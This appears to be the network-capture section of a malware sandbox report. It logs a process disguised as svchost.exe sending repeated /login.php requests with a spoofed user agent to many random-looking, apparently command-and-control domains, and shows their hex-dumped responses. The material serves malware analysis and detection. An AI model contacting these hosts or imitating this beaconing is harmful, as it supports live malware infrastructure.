                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.618666887 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:47.036408901 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.4553303.64.163.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.598859072 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:49.205406904 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 08:58:49.209492922 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:49.404689074 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.45533123.253.46.64807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.610352993 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103749037 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:44 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103765011 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.455333208.91.196.145807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.623604059 CEST312OUTGET / HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww1.lysyfyj.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.455334178.162.203.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.930376053 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.455343199.191.50.83807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:06.696077108 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.45534469.162.80.62807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:08.009785891 CEST293OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
                                                                                                                                                                                                            Sep 8, 2024 08:59:08.538455963 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:08 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 63 34 4e 54 6b 30 4f 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 31 4e 7a 63 34 4e 7a 51 34 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6e 42 71 4e 54 67 32 5a 6e 56 30 4d 47 52 30 62 57 45 34 5a 32 73 77 64 57 31 72 63 57 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 55 33 4e 7a 67 33 4e 44 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NTk0OCwiaWF0IjoxNzI1Nzc4NzQ4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNTg2ZnV0MGR0bWE4Z2swdW1rcWMiLCJuYmYiOjE3MjU3Nzg3NDgsInRzIjoxNzI1Nzc4NzQ4NDc4MjE1fQ.9zHuoOBHgARzq5WxV7T8_hIImeglxwjiZY7HRIfNapc&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.455356188.114.96.3807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.862461090 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.639673948 CEST799INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLUjyn4iKqRXGUyZpSb4%2BmJ04TjTfc5M3eK0VfLUfPF72AiGchqo%2FOTkN%2Bac1XtyjNJKfI%2B6Px2wasVER%2Bq7SMabvHn4CTkWsoZtiZhdxAT2AcelJ8Lmc%2BFDeV%2FisQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e5c0b8b4368-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.944328070 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.313548088 CEST620INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mfcUd%2FZbmR0OdEDZP1R5%2FgOSI0yRmo%2FK%2FWFDLdPSIlBZrPSFK0vGfc9KoLoB4YyJ22pkV6qMAoAYzudnSFzZLDKeREACiHGR25EbzF7S9GPjPxRxQT7VpTQiwsf9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e66bb064368-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.418941975 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.45535713.248.169.48807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.902307034 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.366925001 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.45535818.208.156.248807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.110656977 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupycag.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617265940 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f16f34661847fb372fc650c8a21e7173|8.46.123.33|1725778769|1725778769|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
